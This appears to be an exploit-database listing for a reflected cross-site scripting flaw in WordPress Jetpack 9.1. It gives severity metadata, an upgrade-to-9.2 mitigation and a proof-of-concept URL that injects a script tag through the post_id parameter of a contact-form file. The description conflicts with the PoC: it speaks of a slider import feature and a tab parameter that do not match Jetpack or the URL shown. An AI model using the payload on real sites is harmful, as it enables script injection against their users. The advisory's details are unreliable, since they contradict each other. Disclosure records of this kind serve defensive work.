header-logo
Suggest Exploit
vendor:
Jetpack
by:
Milad karimi
8.8
CVSS
HIGH
Cross Site Scripting (XSS)
79
CWE
Product Name: Jetpack
Affected Version From: 9.1
Affected Version To: 9.1
Patch Exists: YES
Related CWE:
CPE: 2.3:a:wordpress:jetpack
Metasploit:
Other Scripts:
Platforms Tested: Windows 11
2022

WordPress Plugin Jetpack 9.1 – Cross Site Scripting (XSS)

This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

Mitigation:

Upgrade to version 9.2 or later.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)
# Date: 2022-02-07
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/jetpack
# Version: 9.1
# Tested on: Windows 11
# CVE: N/A

1. Description:
This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert("BY Ex3ptionaL")</script>